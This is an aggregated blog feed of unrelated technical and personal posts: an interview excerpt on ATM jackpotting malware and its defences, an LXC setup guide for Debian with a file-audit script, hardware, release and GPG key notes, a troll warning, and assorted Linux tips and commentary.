BK: Wait a second. The media reports to date have observed that most of these ATM malware attacks were going after weaknesses in Windows XP?

OW: It goes deeper than that. Most of these attacks come down to two different ways of jackpotting the ATM. The first is what we call “black box” attacks, where some form of electronic device is hooked up to the ATM — basically bypassing the infrastructure in the processing of the ATM and sending an unauthorized cash dispense code to the ATM. That was the first wave of attacks we saw that started very slowly in 2012, went quiet for a while and then became active again in 2013.

The second type that we’re now seeing more of is attacks that start with the introduction of malware into the machine, and that kind of attack is a little less technical to get on the older machines if protective mechanisms aren’t in place.

BK: What sort of protective mechanisms, aside from physically securing the ATM?

OW: If you work on the configuration setting…for instance, if you lock down the BIOS of the ATM to eliminate its capability to boot from USB or CD drive, that gets you about as far as you can go. In high risk areas, these are the sorts of steps that can be taken to reduce risks.

BK: Seems like a challenge communicating this to your customers who aren’t anxious to spend a lot of money upgrading their ATM infrastructure.

OW: Most of these recommendations and requirements have to be considerate of the customer environment. We make sure we’ve given them the best guidance we can, but at the end of the day our customers are going to decide how to approach this.

BK: You mentioned black-box attacks earlier. Is there one particular threat or weakness that makes this type of attack possible? One recent story on ATM malware suggested that the attackers may have been aided by the availability of ATM manuals online for certain older models.

OW: The ATM technology infrastructure is all designed on multivendor capability. You don’t have to be an ATM expert or have inside knowledge to generate or code malware for ATMs. Which is what makes the deployment of preventative measures so important. What we’re faced with as an industry is a combination of vulnerability on aging ATMs that were built and designed at a point where the threats and risk were not as great.

According to security firm F-Secure, the malware used in the Malaysian attacks was “PadPin,” a family of malicious software first identified by Symantec. Also, Russian antivirus firm Kaspersky has done some smashing research on a prevalent strain of ATM malware that it calls “Tyupkin.” Their write-up on it is here, and the video below shows the malware in action on a test ATM.

In a report published this month, the European ATM Security Team (EAST) said it tracked at least 20 incidents involving ATM jackpotting with malware in the first half of this year. “These were ‘cash out’ or ‘jackpotting’ attacks and all occurred on the same ATM type from a single ATM deployer in one country,” EAST Director Lachlan Gunn wrote. “While many ATM Malware attacks have been seen over the past few years in Russia, Ukraine and parts of Latin America, this is the first time that such attacks have been reported in Western Europe. This is a worrying new development for the industry in Europe.”

Card skimming incidents fell by 21% compared to the same period in 2013, while overall ATM related fraud losses of €132 million (~USD $158 million) were reported, up 7 percent from the same time last year.

Video: http://www.youtube.com/embed/QZvdPM_h2o8

Planet DebianFrancois Marier: LXC setup on Debian jessie

Here's how to set up LXC-based "chroots" on Debian jessie. While this is documented on the Debian wiki, I had to tweak a few things to get the networking to work on my machine.

Start by installing (as root) the necessary packages:

apt-get install lxc libvirt-bin debootstrap

Network setup

I decided to use the default /etc/lxc/default.conf configuration (no change needed here):

lxc.network.type = veth
lxc.network.flags = up
lxc.network.link = virbr0
lxc.network.hwaddr = 00:FF:AA:xx:xx:xx
lxc.network.ipv4 = 0.0.0.0/24

but I had to make sure that the "guests" could connect to the outside world through the "host":

  1. Enable IPv4 forwarding by putting this in /etc/sysctl.conf:

    net.ipv4.ip_forward=1
    
  2. and then applying it using:

    sysctl -p
    
  3. Ensure that the network bridge is automatically started on boot:

    virsh -c lxc:/// net-start default
    virsh -c lxc:/// net-autostart default
    
  4. and that it's not blocked by the host firewall, by putting this in /etc/network/iptables.up.rules:

    -A INPUT -d 224.0.0.251 -s 192.168.122.1 -j ACCEPT
    -A INPUT -d 192.168.122.255 -s 192.168.122.1 -j ACCEPT
    -A INPUT -d 192.168.122.1 -s 192.168.122.0/24 -j ACCEPT
    
  5. and applying the rules using:

    iptables-apply
    

Creating a container

Creating a new container (in /var/lib/lxc/) is simple:

sudo MIRROR=http://http.debian.net/debian lxc-create -n sid64 -t debian -- -r sid -a amd64

You can start or stop it like this:

sudo lxc-start -n sid64 -d
sudo lxc-stop -n sid64

Connecting to a guest using ssh

The ssh server is configured to require pubkey-based authentication for root logins, so you'll need to log into the console:

sudo lxc-stop -n sid64
sudo lxc-start -n sid64

then install a text editor inside the container because the root image doesn't have one by default:

apt-get install vim

then paste your public key in /root/.ssh/authorized_keys.

Then you can exit the console (using Ctrl+a q) and ssh into the container. You can find out what IP address the container received from DHCP by typing this command:

sudo lxc-ls --fancy

Fixing Perl locale errors

If you see a bunch of errors like these when you start your container:

perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
    LANGUAGE = (unset),
    LC_ALL = (unset),
    LANG = "fr_CA.utf8"
    are supported and installed on your system.
perl: warning: Falling back to the standard locale ("C").

then log into the container as root and use:

dpkg-reconfigure locales

to enable the same locales as the ones you have configured in the host.
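
The host-side settings from the "Network setup" steps of the LXC post above can be checked with a short script. This is an added example, not part of the original post: the function names are made up here, the default paths are the two files the post names, and the rule check compares the text as written in the rules file rather than the running firewall state.

```shell
#!/bin/sh
# Added example (not from the original post): audit the two host files that the
# "Network setup" steps edit. Function names are made up for this example.

# Succeeds only if the LAST uncommented net.ipv4.ip_forward assignment in the
# sysctl file is 1; a later "= 0" line overrides an earlier "= 1".
forwarding_enabled() {
    [ -r "$1" ] || return 1
    value=$(sed -n 's/^[[:space:]]*net\.ipv4\.ip_forward[[:space:]]*=[[:space:]]*\([0-9][0-9]*\)[[:space:]]*$/\1/p' "$1" | tail -n 1)
    [ "$value" = "1" ]
}

# The three ACCEPT rules from step 4 of the post, one per line.
expected_bridge_rules() {
    cat <<'EOF'
-A INPUT -d 224.0.0.251 -s 192.168.122.1 -j ACCEPT
-A INPUT -d 192.168.122.255 -s 192.168.122.1 -j ACCEPT
-A INPUT -d 192.168.122.1 -s 192.168.122.0/24 -j ACCEPT
EOF
}

# Collapse runs of blanks and trim both ends so spacing differences do not count.
normalize() {
    sed -e 's/[[:space:]][[:space:]]*/ /g' -e 's/^ //' -e 's/ $//'
}

# Prints every expected rule that is absent from the rules file. A rule counts
# as present only on an exact whole-line match after whitespace normalization,
# so a commented-out rule is reported as missing. An unreadable file reports
# all three rules.
missing_bridge_rules() {
    rules_file=$1
    if [ ! -r "$rules_file" ]; then
        expected_bridge_rules
        return 0
    fi
    expected_bridge_rules | while IFS= read -r rule; do
        if ! normalize < "$rules_file" | grep -qxF -- "$rule"; then
            printf '%s\n' "$rule"
        fi
    done
}

# Runs both checks, prints one line per finding, returns non-zero on any finding.
audit_lxc_host() {
    sysctl_file=${1:-/etc/sysctl.conf}
    rules_file=${2:-/etc/network/iptables.up.rules}
    rc=0
    if ! forwarding_enabled "$sysctl_file"; then
        echo "MISSING in $sysctl_file: net.ipv4.ip_forward=1"
        rc=1
    fi
    missing=$(missing_bridge_rules "$rules_file")
    if [ -n "$missing" ]; then
        printf '%s\n' "$missing" | while IFS= read -r rule; do
            echo "MISSING in $rules_file: $rule"
        done
        rc=1
    fi
    return $rc
}

# Check the real files only when asked to: sh audit.sh --audit
if [ "${1:-}" = "--audit" ]; then
    audit_lxc_host
fi
```

The script reads files only, so a setting that is in the file but was never applied with sysctl -p or iptables-apply still passes.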


Planet DebianNeil Williams: OpenTAC – an automation lab in a box

I’ve previously covered running LAVA on ARM devices, now that the packages are in Debian. I’ve also covered setting up the home lab, including the difficulty in obtaining the PDU and relying on another machine to provide USB serial converters with inherent problems of needing power to keep the same devices assigned to the same ser2net ports.

There have been ideas about how to improve the situation. Conferences are a prime example – setting up a demo involving LAVA means bringing a range of equipment, separate power bricks, separate network switches (with power bricks), a device of some kind to connect up the USB serial converters (and power brick) and then the LAVA server (with SATA drive and power brick) – that is without the actual devices and their cables and power. Each of those power cables tends to be a metre long, with networking and serial, it quickly becomes a cable spaghetti.

Ideas around this also have application inside larger deployments, so the hardware would need to daisy-chain to provide services to a rack full of test devices.

The objective is a single case providing network, power and serial connectivity to a number of test devices over a single power input and network uplink. Naturally, with a strong free software and open development bias, the unit will be Open Hardware running Debian, albeit with a custom Beaglebone Linux kernel. It’s a Test Automation Controller, so we’re using the name OpenTAC.

Progress

Open hardware ARM device running Debian to automate tests on 4 to 8 devices, initially aimed at LAVA support for Linaro engineers. Power distribution, serial console, network and optional GPIO extensions.

The design involves:

  • A Beaglebone Black (revC)
    • USB hotplug support required, certainly during development.
  • Custom PCB connected as a Beaglebone Cape, designed by Andy Simpkins.
  • Base board provides 4 channels:
    • 5V Power – delivered over USB
    • Ethernet – standard Cat5, no LEDs
    • Serial connectivity
      • RS232
      • UART
    • GPIO
  • Internal gigabit network switch
  • Space for a board like a CubieTruck (with SATA drive) to act as LAVA server
  • Daughter board:
    • Same basic design as the base board, providing another 4 channels, equivalent to the base channels. When the daughter board is fitted, a second network switch would be added instead of the CubieTruck.
  • Power consumption measurement per channel
    • queries made via the Beaglebone Black over arbitrary time periods, including during the test itself.
  • The GPIO lines can be used to work around issues with development boards under test, including closing connections which may be required to get a device to reboot automatically, without manual intervention.
  • Serial connections to test devices can be isolated during device power-cycles – this allows for devices which pull power over the serial connection. (These are typically hardware design issues but the devices still need to be tested until the boards can be modified or replaced.)
  • Thermal control, individual fan control via the Beaglebone Black.
  • 1U case – rackable or used alone on the desk of developers.
  • Software design:
    • lavapdu backend module for PDU control (opentac.py) & opentac daemon on the BBB
      • telnet opentac-01 3225
    • ser2net for serial console control
      • telnet opentac-01 4000

The initial schematics are now complete and undergoing design review. A lot of work remains …

Chaotic IdealismThis Cool Thing My Cat Did

So today I'm walking down a hallway, shoes on and intent on getting to the door because, darn it, if I don't go shopping today I'll have to go a sixth day without a shower curtain. And Tiny, all twelve pounds of inquisitive nannyish boy-cat, comes down the hallway the other way. It's a narrow hallway because the apartment's small and there's a vacuum cleaner on one side of it, so we can't pass by each other comfortably.

Tiny looks at me, looks at my big clunky shoes (which he hates me wearing, since they make me clumsy and noisy), and stops right where he is. He's saying, "Uhh... you first," and thinking "Bzzzzt! Clumsy human sighted! Collision avoidance system activated!"

I look at Tiny and I automatically move to the side of the hallway, pressing myself against the wall. Tiny sees this, his tail goes up, and he marches through the provided gap. He's acknowledging that I've given him the right of way, and he's saying, "Thanks, have a good day!"

I've seen this happen so many times with humans in narrow spaces, but I didn't realize cats did it, too. It shouldn't surprise me that Tiny gets the idea of sharing a narrow hallway, since he's so good at figuring out everything else I do. In fact, I'm pretty sure he gets it better than me--there have been many times when I've run into things, tangled up foot traffic, and generally caused confusion because I couldn't insert myself properly into the rhythm of people walking and sharing a sidewalk. But Tiny gets it.

My cat is awesome.

Planet DebianDirk Eddelbuettel: littler 0.2.1


A new maintenance release of littler is available now.

The main changes are a few updates and extensions to the examples provided along with littler. Several of those continue to make use of the wonderful docopt package by Edwin de Jonge. Carl Boettiger and I are making good use of these littler examples, particularly to install directly from CRAN or GitHub, in our Rocker builds of R for Docker (about which we should have a bit more to blog soon too).

Full details for the littler release are provided as usual at the ChangeLog page.

The code is available via the GitHub repo, from tarballs off my littler page and the local directory here. A fresh package has gone to the incoming queue at Debian; Michael Rutter will probably have new Ubuntu binaries at CRAN in a few days too.

Comments and suggestions are welcome via the mailing list or issue tracker at the GitHub repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Planet DebianThorsten Alteholz: Key transition, move to stronger key

Finally I was able to do the enormous paperwork (no, it is not that much) to switch my old 1024D key to a new 4096R one. I was a bit afraid that there might be something bad happening, but my fear was without any reason. After the RT bug was closed, I could upload and send signed emails to mailing lists. So thanks a lot to everyone involved.

old key, 0xD362B62A54B99890

pub   1024D/54B99890 2008-07-23
      Key fingerprint = 36E2 EDDE C21F EC8F 77B8  7436 D362 B62A 54B9 9890
uid                  Thorsten Alteholz (...)
sub   4096g/622D94A8 2008-07-23


new key, 0xA459EC6715B0705F

pub   4096R/0xA459EC6715B0705F 2014-02-03
  Schl.-Fingerabdruck = C74F 6AC9 E933 B306 7F52  F33F A459 EC67 15B0 705F
uid                 [ uneing.] Thorsten Alteholz (...)
sub   4096R/0xAE861AE7F39DF730 2014-02-03
  Schl.-Fingerabdruck = B8E7 6074 5FF4 C707 1C77  870C AE86 1AE7 F39D F730
sub   4096R/0x96FCAC0D387B5847 2014-02-03
  Schl.-Fingerabdruck = 6201 FBFF DBBD E078 22EA  BB96 96FC AC0D 387B 5847

Geek FeminismLinkspam, fire, and dangerous things (19 October 2014)

Gamergate and online harassment

Other Stuff

  • Ada Lovelace, a Computer Programmer Ahead of Her Time | Mashable (October 15): Read more about the life of the “enchantress of numbers”
  • Ways Men In Tech Are Unintentionally Sexist | this is not a pattern (October 14): “These are little things. Things that many people do without thinking about them and certainly without intending anything by them. Things that individually are meaningless, but in aggregate set the tone of an entire community.”
  • The Malala you won’t hear about | The People’s Record (October 16): “This is the Malala the Western corporate media doesn’t like to quote. This is the Malala whose politics do not fit neatly into the neocolonialist, cookie-cutter frame of presentation. This is the Malala who recognizes that true liberation will take more than just education, that it will take the establishment of not just bourgeois political “democracy,” but of economic democracy, of socialism.”
  • Where’s Thor When You Need Her? Women In Comics Fight An Uphill Battle | NPR (October 10): “On Facebook, women make up just under half of all self-identified comics fans. But even as the female audience grows, female creators for DC and Marvel, colloquially known as “the Big Two,” are still in the minority.”
  • Internal Memo: Microsoft CEO Satya Nadella sets new diversity plan after ‘humbling’ experience | GeekWire (October 15): “The memo, sent prior to a regular monthly Q&A session with employees, went on to outline a series of steps that Nadella says the company will be taking to improve diversity and inclusion across the company, including the company’s engineering and senior leadership teams.”
  • FiveThirtyEight Turns the Lidless Eye of Data Crunching to Gender Disparity in Superhero Comics Characters | The Mary Sue (October 15): “Hanley has been crunching the numbers on the gender make up of the folks who work on Marvel and DC comics for years, but FiveThirtyEight wanted to take a slightly different tack by looking at the characters who make up those comics in the first place.”
  • Mary Berners-Lee: Ada Lovelace Day Hero | equalitism (October 19): “Tim Berners-Lee’s mom, Mary Lee Woods was a badass mathematician/computer scientist before he was. Both of Tim’s parents worked on a team that developed programs in the School of Computer Science, University of Manchester Mark 1, Ferranti Mark 1 and Mark 1 Star computers.”
We link to a variety of sources, some of which are personal blogs. If you visit other sites linked herein, we ask that you respect the commenting policy and individual culture of those sites.

You can suggest links for future linkspams in comments here, or by using the “geekfeminism” tag on Pinboard, Delicious or Diigo; or the “#geekfeminism” tag on Twitter. Please note that we tend to stick to publishing recent links (from the last month or so).

Thanks to everyone who suggested links.

    Planet Linux Australialinux.conf.au News: Speaker Feature: Pavel Emelyanov, Alasdair Allan

    Pavel Emelyanov


    Libcontainer: One lib to rule them all

    10:40 pm Friday 16th January 2015

    Pavel Emelyanov is a principal engineer at Parallels working on server virtualization projects. He holds a PhD degree in Applied Mathematics from the Moscow Institute of Physics and Technology. His speaking experience includes the talk on network namespaces at LinuxCon 2009 and the presentation of the Virtuozzo resource management at the joint memory management, storage and filesystem summit in April 2011.

    For more information on Pavel and his presentation, see here. You can follow him as @xemulp and don’t forget to mention #LCA2015.


    Alasdair Allan


    Open Source Protocols and Architectures to Fix the Internet of Things…

    3:40pm Friday 16th January 2015

    Alasdair is a scientist, author, hacker, tinkerer and co-founder of a startup working on fixing the Internet of Things. He spends much of his time probing current trends in an attempt to determine which technologies are going to define our future.

    He has also written articles for Make magazine. The latest entitled “Pick up your tools and get started!” posted 1 September 2014.

    For more information on Alasdair and his presentation, see here. You can follow him as @aallan and don’t forget to mention #LCA2015.

    Planet Linux AustraliaSridhar Dhanapalan: Twitter posts: 2014-10-13 to 2014-10-19

    Planet Linux AustraliaMark Terle: A preponderance of yak shaving….

    It is often observed that attempting to undertake one task begets another, with the corollary that two days later you’ve built a bikeshed painted in a multitude of colours.

    So, dear readers, this tale of woe begins with the need to update my blog to something useful after 18 months of neglect and more. I had been writing a travel blog from when I took some leave off work to wander the globe. For this task, a new more generic DNS entry and an upgrade to the WordPress installation and syndication with my Advogato blog. Easily accomplished and a sense of progress.

    This blog entry is going to be mostly a technical one. I’ll try incorporating more of real life in other entries.

    Great, now I can tell the world about my little project toying with Vagrant and Puppet.

    It is called “Browser In A Box”. It is up on Github https://github.com/mtearle/browser-in-a-box

    It is very simple, a Vagrant file and a set of Puppet manifests/modules to launch Chromium in kiosk mode inside a VM to hit a certain URL. This is part of planned later work to look at creating a Vagrant development environment for Concerto.

    At this point, I got distracted … aside from the liberal upgrades of bash on various machines to address Shellshock.

    Then I accidentally purchased a new Ultrabook. My previous netbook had been getting long in the tooth and it was time to upgrade. I ended up purchasing a Toshiba Satellite NB10, a reasonable processor Intel N2830, 4 Gig of RAM and 500 Gigs of spinning rust. Those are the nice bits.

    On the negatives, Crappy Toshiba keyboard layout with the ~ key in a stupid spot and a UEFI bios. It is now blatantly apparent why Matthew Garrett drinks copious quantities of gin.

    Special brickbats go to the Ubuntu installer for repartitioning and eating my Windows installation and recovery partition. (The option to install over my test Debian installation got over enthusiastic).  The wireless chipset (Atheros) has a known problem where it confuses the access point.

    The next distraction ended up being a fit of procrastination in terms of rearranging my tiny apartment. I’ve now modelled it in a program called Sweet Home 3D. Easy and straightforward to use. Needs a few more furniture models, but perfectly functional. I shall use it again next time I move.

    Finally, we arrive at the original task. I want to start syncing my calendars between various locations (written here for my benefit later).

    They are:

    • Work stream – From my Work (Exchange) to my private host (Radicale) to Google Calendar (which will get to my Android phone)
    • Personal stream – From my private host (Radicale) to Google Calendar (and back again)
    • Party stream – From Facebook’s ical export to my private host and Google Calendar

    In addition, various syncing of contacts but not my primary focus at the moment.

    It appears that syncevolution will do most of what I want here. The challenge revolves around how to get it working. Ultimately, I want to have this live headless hosted on a virtual machine not running a desktop.

    In a fit of enthusiasm, I decided upon attempting to build it from source as opposed to using the packages provided from the upstream (to avoid dragging in unnecessary dependencies).

    I need to build from HEAD due to recent code added to syncevolution to support the change in Google’s CALDAV API to be behind OAuth V2.

    This was not an overly successful exercise, I ended up getting something built but it didn’t ultimately work.

    Problems encountered were:

    • libwbxml2 – The upstream at opensync.org is down. There appear to be forks, so playing the game of guessing the current head/release version.
    • activesyncd – Build system is currently broken in parts. There appears to be bit rot around the evolution bindings as the evolution API has changed

    I gave up at that point. I’ve since spun up a different virtual machine with Debian Jessie and an install of Gnome. The packages from the syncevolution upstream installed cleanly, but have yet to work out the incarnations to make it work. However, that my friends is a story for a later blog entry…

    Planet Linux Australialinux.conf.au News: Multimedia and Music Miniconf - Call for Papers

    The Multimedia and Music Miniconf at LCA2015 will be held in Auckland, New Zealand, on Monday 12 January 2015. We are pleased to formally open the miniconf's Call for Papers. Submissions are encouraged from anyone with a story to tell which is related to open software for multimedia or music.

    Examples of possible presentations include:

    • demonstrations of multimedia content authored using Open Source programs
    • audio recording examples
    • Open Source games
    • video and image editing on Linux
    • new multimedia software being written
    • multimedia web APIs and applications
    • unusual uses of Open Source multimedia software
    • codec news

    In addition, we are planning to hold an informal jam session at the end of the Miniconf, giving community members a chance to showcase their compositions and multimedia creations. Expressions of interest for this are also invited. If musical instruments are required it is preferable if participants arrange this themselves, but with sufficient lead time it might be possible to arrange a loan from locals in Auckland.

    The miniconf website at annodex.org/events/lca2015 has further details about the miniconf.

    To submit a proposal or for further information, please email Jonathan Woithe (jwoithe@atrad.com.au) or Silvia Pfeiffer (silviapfeiffer1@gmail.com).

    Jonathan Woithe and Silvia Pfeiffer

    (Multimedia and Music miniconf organisers)

    Planet DebianBenjamin Mako Hill: Another Round of Community Data Science Workshops in Seattle

    Pictures from the CDSW sessions in Spring 2014

    I am helping coordinate three and a half day-long workshops in November for anyone interested in learning how to use programming and data science tools to ask and answer questions about online communities like Wikipedia, free and open source software, Twitter, civic media, etc. This will be a new and improved version of the workshops run successfully earlier this year.

    The workshops are for people with no previous programming experience and will be free of charge and open to anyone.

    Our goal is that, after the three workshops, participants will be able to use data to produce numbers, hypothesis tests, tables, and graphical visualizations to answer questions like:

    • Are new contributors to an article in Wikipedia sticking around longer or contributing more than people who joined last year?
    • Who are the most active or influential users of a particular Twitter hashtag?
    • Are people who participated in a Wikipedia outreach event staying involved? How do they compare to people that joined the project outside of the event?

    If you are interested in participating, fill out our registration form here before October 30th. We were heavily oversubscribed last time so registering may help.

    If you already know how to program in Python, it would be really awesome if you would volunteer as a mentor! Being a mentor will involve working with participants and talking them through the challenges they encounter in programming. No special preparation is required. If you’re interested, send me an email.


    Planet DebianSteve Kemp: On the names we use in email

    Yesterday I received a small rush of SPAM mails, all of which were 419 scams, and all of them sent by "Mrs Elizabeth PETERSEN".

    It struck me that I can't think of ever receiving a legitimate mail from a "Mrs XXX [YYY]", but I was too busy to check.

    Today I've done so. Of the 38,553 emails I've received during the month of October 2014 I've got a hell of a lot of mails with a From address including a "Mrs" prefix:

    "Mrs.Clanzo Amaki" <marilobouabre14@yahoo.co.jp>
    "Mrs Sarah Mamadou"<investment@payment.com>
    "Mrs Abia Abrahim" <missfatimajinnah@yahoo.co.jp>
    "Mrs. Josie Wilson" <linn3_2008@yahoo.co.jp>
    "Mrs. Theresa Luis"<tomaslima@jorgelima.com>
    

    There are thousands more. Not a single one of them was legitimate.

    I have one false-positive when repeating the search for a Mr-prefix. I have one friend who has set his sender-address to "Mr Bob Smith", which always reads weirdly to me, but every single other email with a Mr-prefix was SPAM.

    I'm not going to use this in any way, since I'm happy with my mail-filtering setup, but it was an interesting observation.

    Names are funny. My wife changed her surname post-marriage, but that was done largely on the basis that introducing herself as "Doctor Kemp" was simpler than "Doctor Foreign-Name", she'd certainly never introduce herself ever as Mrs Kemp.

    Trivia: In Finnish the word for "Man" and "Husband" is the same (mies), but the word for "Woman" (nainen) is different than the word for "Wife" (vaimo).

    LongNowThe Manual for Civilization takes The Knight Foundation News Challenge


    What captures your imagination about the future of libraries?

    That’s the question asked by The Knight Foundation in an open call for innovative library projects. There have been 680 proposals from around the country, and only a few days remain to give feedback and “Applaud” your favorites.  We think our Manual for Civilization project fits well with The Knight Foundation’s News Challenge funding goal:

    We view libraries as key for improving Americans’ ability to know about and to be involved with what takes place around them. The library has been a vital part of our communities for centuries—as keepers of public knowledge, spaces for human connection, educators for the next generations of learners. While habits are changing, those needs have not. We want to discover projects that help carry the values of libraries into the future.

    Take a moment to read our proposal, comment, and click the Applause button to show your support for the Manual for Civilization. Many projects will be funded to fulfill the News Challenge’s aim of [accelerating] media innovation by funding breakthrough ideas in news and information. Your applause could help the Manual be one of them.

    The Manual for Civilization is a crowd-curated library of the 3500 books most essential to sustain or rebuild civilization. Knight Foundation funds will help us complete our collection of books–including many rare, hard-to-find titles. It would also support live events to engage the community and online initiatives providing broader access to the project. Read more on the News Challenge website.

    Planet DebianErich Schubert: Beware of trolls - do not feed

    A particularly annoying troll has been on his hate crusade against systemd for months now.
    Unfortunately, he's particularly active on Debian mailing lists (but apparently also on Ubuntu and the Linux Kernel mailing list) and uses tons of fake users he keeps on setting up. Our listmasters have a hard time blocking all his hate, sorry.
    Obviously, this is also the same troll that has been attacking Lennart Poettering.
    There is evidence that this troll used to go by the name "MikeeUSA", and has quite a reputation with anti-feminist hate for over 10 years now.
    Please, do not feed this troll.
    Here are some names he uses on YouTube: Gregory Smith, Matthew Bradshaw, Steve Stone.
    Blacklisting is the best measure we have, unfortunately.
    Even if you don't like the road systemd is taking or Lennart Poettering personally - the behaviour of that troll is unacceptable to say the least; and indicates some major psychological problems... also, I wouldn't be surprised if he is also involved in #GamerGate.
    See this example (LKML) if you have any doubts. We seriously must not tolerate such poisonous people.
    If you don't like systemd, the acceptable way of fighting it is to write good alternative software (and you should be able to continue using SysV init or openRC, unless there is a bug, in Debian - in this case, provide a bug fix). End of story.

    Sociological ImagesChart of the Week: Politicians Following, Not Leading on Same-Sex Marriage

    For those of us in favor of same-sex marriage rights, it’s been an exciting few years. Politicians and legislatures have been increasingly tipping toward marriage equality. Lots of us are commending the powerful and high-profile individuals who have decided to support the cause.

    But, let’s not be too grateful.

    A figure at xkcd puts this in perspective. It traces four pieces of data over time: popular approval and legalization of both interracial marriage and same-sex marriage. It shows that the state-by-state legalization of same-sex marriage is following public opinion, whereas the legalization of interracial marriage led public opinion.


    There’s a reason that we look back at Civil Rights legislation and see leadership. Politicians, litigators, and activists were pushing for rights that the public wasn’t necessarily ready to extend. In comparison, today’s power brokers appear to be following public opinion, changing their mind because the wind is suddenly blowing a new way.

    I’m sure there are politicians out there taking risks at the local level. On the whole, though, this doesn’t look like leadership, it looks like political expedience.

    Lisa Wade is a professor of sociology at Occidental College and the co-author of Gender: Ideas, Interactions, Institutions. You can follow her on Twitter and Facebook.

    (View original at http://thesocietypages.org/socimages)

    Planet Linux AustraliaAndrew Donnellan: KDE 4/Plasma system tray not displaying applications, notifications appearing twice

    So I was trying to get RSIBreak working on my machine today, and for some reason it simply wasn’t displaying an icon in the Plasma system tray as it was meant to.

    It took some searching around, but eventually I came across a comment on a KDE bug report that had the answer.

    I opened up ~/.kde/config/plasma-desktop-appletsrc, searched for “systemtray“, and lo and behold, there were two Containments, both using the systemtray plugin. It seems that at some point during the history of my KDE installation, I ended up with two system trays, just with one that wasn’t visible.

    After running kquitapp plasma to kill the desktop, I removed the first systemtray entry (I made an educated guess and decided that the first one was probably the one I didn’t want any more), saved the file and restarted Plasma.

    Suddenly, not only did RSIBreak appear in my system tray, but so did a couple of other applications which I forgot I had installed. This also fixed the problem I was having with all KDE notifications appearing on screen twice, which was really rather annoying and I’m not sure how I coped with it for so long…



    Planet Linux AustraliaAndrew Donnellan: The r8169 driver and mysterious network problems

    A few months ago, a friend of mine was having a problem. When he hooked up his Toshiba laptop to the Ethernet port in his bedroom, it would work under Windows, but not under Linux. When he hooked it up to the port in the room next door, it would work under both.

    I headed over with my Samsung Ultrabook, and sure enough – it worked fine under Windows, but not Linux, while the room next door worked under both.

    As it turns out, both our laptops used Realtek RTL8168-series Ethernet controllers, which are normally handled just fine by the r8169 driver, which can be found in the kernel mainline. However, Realtek also releases a r8168 driver (available in Debian as r8168-dkms). Upon installing that, everything worked fine.

    (At some point I should probably go back and figure out why it didn’t work under r8169 so I can file a bug…)



    Don MartiSnapchat ads and committing to non-targeting

    Recent Snapchat blog, announcing ads:

    We want to see if we can deliver an experience that’s fun and informative, the way ads used to be, before they got creepy and targeted. It’s nice when all of the brilliant creative minds out there get our attention with terrific content.

    That's a great idea, and ties in with what I've been saying all along about the targeted ad problem.

    But I'm not optimistic. Snapchat is still running on a mobile phone, running within an environment that's either problematic or outright privacy-hostile. If Snapchat can't commit to its core feature, the idea that photos disappear after sending, how can the company credibly commit to less creepy, more valuable advertising?

    It would be a huge win for Snapchat if they could pull it off. But I doubt that a single app can do it.

    Signalful ads are an emergent benefit from media that tend to build user confidence through tracking resistance. Non-creepiness can't be declared, it has to be discovered.

    Planet DebianRhonda D'Vine: Trans Gender Moves

    Yesterday I managed to get the last ticket from the waiting list for the premiere of Trans Gender Moves. It is a play about the lives of three people: A transman, a transwoman and an intersexual person. They tell stories from their life, their process of finding their own identity over time. With in parts amusing anecdotes and ones that get you thinking I can just wholeheartedly encourage you to watch it if you have the chance to. It will still be shown the next few days, potentially extending depending on the requests for tickets, from what I've been told by one of the actors.

    The most funny moment for me though was when I was talking with one of the actors about that it really touched me that I was told that one of them will be moving into the same building I will be moving into in two years' time. Unfortunately that will be delayed a bit because they found me thinks field hamster or the likes in the ground and have to wait until spring for them to move. :/


    Planet Linux AustraliaLev Lafayette: PRINCE2 Checklist and Flowchart

    Recently a simple statement of PRINCE2 governance structures was provided. From this it is possible to derive a checklist for project managers to tick off, just to make sure that everything is done. Please note that this checklist is tailored and combines some functions. For example, there is no Business Review Plan as it is argued that any sensible project should incorporate these into the Business Case and the Project Plan.

    A simple graphic is provided to assist with this process


    Planet Linux AustraliaLev Lafayette: File Creation Time in Linux

    Linux offers most of the expected file attributes from the command line, including the owner of a file, the group, the size, the date modified and name. However, users often want to find out when a file was created. This requires a little bit of extra investigation.


    Worse Than FailureAnnouncements: The New Look is Here

    As you may have noticed, the site looks quite a bit different! As I mentioned back in March, it's been almost seven years since the look and feel of The Daily WTF has been updated, and I was getting pretty tired of the "2003ish" vibe the site had.

    You guys gave some fantastic feedback to help guide the new design, and in July I shared a preview look. After some more feedback - both on the GitHub issue tracker and the forums - we put on the finishing touches and launched the site this evening.

    Of course, it's not perfect - there are a few issues I found when writing this article, and I'm sure we'll find a lot more. But it's a big improvement and, because all of teh codez are on GitHub, it'll be a lot easier to fix things. So if you notice any glitches or have ideas for improvements, please post an issue, submit a pull request, post something in this article's discussion, or contact me directly.


    CryptogramFriday Squid Blogging: 1,057 Squid T-Shirts

    That's a lot.

    As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.

    Commenting has been broken for the past few days. We hope to get it fixed on Monday.

    Planet Linux AustraliaErik de Castro Lopo: Haskell : A neat trick for GHCi

    Just found a really nice little hack that makes working in the GHC interactive REPL a little easier and more convenient. First of all, I added the following line to my ~/.ghci file.

      :set -DGHC_INTERACTIVE
    
    

    All that line does is define a GHC_INTERACTIVE pre-processor symbol.

    Then in a file that I want to load into the REPL, I need to add this to the top of the file:

      {-# LANGUAGE CPP #-}
    
    

    and then in the file I can do things like:

      #ifdef GHC_INTERACTIVE
      import Data.Aeson.Encode.Pretty
    
      prettyPrint :: Value -> IO ()
      prettyPrint = LBS.putStrLn . encodePretty
      #endif
    
    

    In this particular case, I'm working with some relatively large chunks of JSON and it's useful to be able to pretty print them when I'm in the REPL, but I have no need for that function when I compile that module into my project.

    TEDReflections on TEDGlobal 2014, from the community

    TEDGlobal 2014 brought our conference to the tropics. Here's what the community had to say following this conference all about the theme "South!" Photo: Ryan Lash


    One of the best things about a week after a conference? The chance to reflect on the experience. In the last week, several TEDGlobal 2014 attendees and community members have shared their thoughts throughout the blogiverse. Below, some highlights:

    Steve Song shared his experience preparing to speak at TED in a post called “Steve and TED’s Excellent Adventure.” “Have you ever found yourself at a party where you felt like if someone discovered who you really were, you would be ejected immediately? That’s a little bit how I’ve felt for the last six months since my invitation to speak at TEDGlobal 2014,” he writes in a wonderful diary. “My dominant emotion in coming away from TEDGlobal — a powerful urge to kick things up a notch.  Several notches, actually.”

